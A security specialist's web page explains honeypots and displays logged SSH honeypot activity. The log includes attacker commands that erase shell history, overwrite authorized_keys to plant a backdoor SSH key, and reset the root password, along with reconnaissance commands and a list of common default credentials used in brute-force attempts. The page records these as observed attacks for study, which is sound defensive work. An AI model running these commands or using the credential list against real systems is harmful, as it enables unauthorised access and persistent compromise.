
# Ethical Hacker & ICT Security Specialist

Honeypot

In computing, a honeypot (literally: "honey jar") is a system or hardware/software component used as a decoy to study and analyze cyber attacks in real time.

It usually consists of one or more sites or services that appear to be part of the network and to contain information valuable to an attacker, but that are in fact well isolated and contain no real data, while giving whoever administers them every detail of the attacks they receive.

The primary value of a honeypot is therefore the information it provides on the nature and frequency of the attacks it receives.

If you are curious to discover this world, look at the real-time attack statistics that my honeypot network records hour after hour:

Live dictionaries

You can download dictionaries of passwords, usernames, and user/pass pairs extracted from attacks against the SSH service:

All the honeypot statistics follow:

SSH

Last 50 commands executed
Date  Command  Source
2019-04-20 23:56:50  uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd  61.91.109.55 Thailand
2019-04-20 23:50:41  uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd  64.52.23.105 United States
2019-04-20 23:00:57  lscpu | grep Model  115.236.33.226 China
2019-04-20 23:00:51  uname -a  115.236.33.226 China
2019-04-20 23:00:46  uname  115.236.33.226 China
2019-04-20 23:00:40  top  115.236.33.226 China
2019-04-20 23:00:36  cat /proc/cpuinfo | grep model | grep name | wc -l  115.236.33.226 China
2019-04-20 23:00:30  uname -m  115.236.33.226 China
2019-04-20 23:00:25  w  115.236.33.226 China
2019-04-20 23:00:20  crontab -l  115.236.33.226 China
2019-04-20 23:00:15  ls -lh $(which ls)  115.236.33.226 China
2019-04-20 23:00:15  which ls  115.236.33.226 China
2019-04-20 23:00:11  free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7}  115.236.33.226 China
2019-04-20 23:00:10  free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'  115.236.33.226 China
2019-04-20 23:00:05  cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'  115.236.33.226 China
2019-04-20 23:00:05  cat /proc/cpuinfo | grep name | head -n 1 | awk {print $4,$5,$6,$7,$8,$9;}  115.236.33.226 China
2019-04-20 23:00:00  echo -e "gay\\naQWBQkFoXQFN\\naQWBQkFoXQFN"|passwd|bash  115.236.33.226 China
2019-04-20 23:00:00  Enter new UNIX password:  115.236.33.226 China
2019-04-20 22:59:55  cat /proc/cpuinfo | grep name | wc -l  115.236.33.226 China
2019-04-20 22:49:38  uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd  106.12.90.123 China
2019-04-20 22:40:01  lscpu | grep Model  213.108.216.27 Russian Federation
2019-04-20 22:39:56  uname -a  213.108.216.27 Russian Federation
2019-04-20 22:39:49  lscpu | grep Model  92.81.222.217 Romania
2019-04-20 22:39:44  uname  213.108.216.27 Russian Federation
2019-04-20 22:39:40  uname -a  92.81.222.217 Romania
2019-04-20 22:39:34  top  213.108.216.27 Russian Federation
2019-04-20 22:39:29  uname  92.81.222.217 Romania
2019-04-20 22:39:22  cat /proc/cpuinfo | grep model | grep name | wc -l  213.108.216.27 Russian Federation
2019-04-20 22:39:18  top  92.81.222.217 Romania
2019-04-20 22:39:12  uname -m  213.108.216.27 Russian Federation
2019-04-20 22:39:07  cat /proc/cpuinfo | grep model | grep name | wc -l  92.81.222.217 Romania
2019-04-20 22:39:01  w  213.108.216.27 Russian Federation
2019-04-20 22:38:56  uname -m  92.81.222.217 Romania
2019-04-20 22:38:51  lscpu | grep Model  178.128.162.10 Greece
2019-04-20 22:38:46  crontab -l  213.108.216.27 Russian Federation
2019-04-20 22:38:41  w  92.81.222.217 Romania
2019-04-20 22:38:36  uname -a  178.128.162.10 Greece
2019-04-20 22:38:32  crontab -l  92.81.222.217 Romania
2019-04-20 22:38:27  ls -lh $(which ls)  213.108.216.27 Russian Federation
2019-04-20 22:38:27  which ls  213.108.216.27 Russian Federation
2019-04-20 22:38:23  uname  178.128.162.10 Greece
2019-04-20 22:38:17  ls -lh $(which ls)  92.81.222.217 Romania
2019-04-20 22:38:17  which ls  92.81.222.217 Romania
2019-04-20 22:38:13  top  178.128.162.10 Greece
2019-04-20 22:38:09  free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'  213.108.216.27 Russian Federation
2019-04-20 22:38:09  free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7}  213.108.216.27 Russian Federation
2019-04-20 22:38:02  cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'  213.108.216.27 Russian Federation
2019-04-20 22:38:02  cat /proc/cpuinfo | grep name | head -n 1 | awk {print $4,$5,$6,$7,$8,$9;}  213.108.216.27 Russian Federation
2019-04-20 22:37:57  free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'  92.81.222.217 Romania
2019-04-20 22:37:57  free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7}  92.81.222.217 Romania
Last 20 sessions
TOP 15 USER+PASS
Count  Username  Password
437715 adminadmin123
13785 rootchangeme
4242 admin
1729 adminaerohive
1294 ubntubnt
760 adminadmin
511 supportsupport
419 rootadmin
394 useruser
374 serviceservice
357 root!@
340 piraspberry
330 usuariousuario
304 111111admin
302 adm12345678
TOP 20 SUCCESSFUL LOGIN IPs
TOP 20 attackers

If you want to see the code that generates this page, go to the site of my HoneyStats project! (github)

Want even more? Follow me into the lab!